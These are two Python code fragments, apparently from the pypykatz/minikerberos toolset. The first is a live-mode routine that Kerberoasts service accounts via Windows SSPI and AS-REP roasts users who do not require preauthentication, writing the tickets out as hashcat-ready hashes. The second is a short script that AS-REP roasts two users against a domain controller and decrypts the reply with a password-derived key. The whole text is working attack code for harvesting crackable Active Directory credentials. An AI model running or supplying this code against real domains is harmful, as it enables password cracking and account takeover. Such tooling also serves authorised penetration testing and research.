def run_live(self, args): from winsspi.sspi import KerberoastSSPI from minikerberos.security import TGSTicket2hashcat, APREPRoast from minikerberos.utils import TGTTicket2hashcat from minikerberos.communication import KerberosSocket from minikerberos.common import KerberosTarget from pypykatz.commons.winapi.machine import LiveMachine if not args.target_file and not args.target_user: raise Exception( 'No targets loaded! Either -u or -t MUST be specified!') machine = LiveMachine() realm = args.realm if not args.realm: realm = machine.get_domain() if args.cmd in ['spnroast', 'asreproast']: targets = [] if args.target_file: with open(args.target_file, 'r') as f: for line in f: line = line.strip() domain = None username = None if line.find('/') != -1: #we take for granted that usernames do not have the char / in them! domain, username = line.split('/') else: username = line if args.realm: domain = args.realm else: if domain is None: raise Exception( 'Realm is missing. Either use the -r parameter or store the target users in <realm>/<username> format in the targets file' ) target = KerberosTarget() target.username = username target.domain = domain targets.append(target) if args.target_user: for user in args.target_user: domain = None username = None if user.find('/') != -1: #we take for granted that usernames do not have the char / in them! domain, username = user.split('/') else: username = user if args.realm: domain = args.realm else: if domain is None: raise Exception( 'Realm is missing. Either use the -r parameter or store the target users in <realm>/<username> format in the targets file' ) target = KerberosTarget() target.username = username target.domain = domain targets.append(target) results = [] errors = [] if args.cmd == 'spnroast': for spn_name in targets: ksspi = KerberoastSSPI() try: ticket = ksspi.get_ticket_for_spn( spn_name.get_formatted_pname()) except Exception as e: errors.append((spn_name, e)) continue results.append(TGSTicket2hashcat(ticket)) elif args.cmd == 'asreproast': dcip = args.dc_ip if args.dc_ip is None: dcip = machine.get_domain() ks = KerberosSocket(dcip) ar = APREPRoast(ks) results = ar.run(targets) if args.out_file: with open(args.out_file, 'w') as f: for thash in results: f.write(thash + '\r\n') else: for thash in results: print(thash) for err in errors: print('Failed to get ticket for %s. Reason: %s' % (err[0], err[1])) logging.info('SSPI based Kerberoast complete')
import hashlib ccred = KerberosCredential() ccred.username = '******' ccred.domain = 'TEST.corp' ccred2 = KerberosCredential() ccred2.username = '******' ccred2.domain = 'TEST.corp' creds = [ccred, ccred2] ks = KerberosSocket('192.168.9.1') ar = APREPRoast(ks) res = ar.run(creds) rep = res[0] print(res) x, a, enctype, checksum, data = rep.split('$') password = '******' cipher = _enctype_table[int(enctype)] key = Key(int(enctype), hashlib.new('md4', password.encode('utf-16-le')).digest()) cipherText = bytes.fromhex(checksum + data) temp = cipher.decrypt(key, 3, cipherText) print() print() print(temp.hex())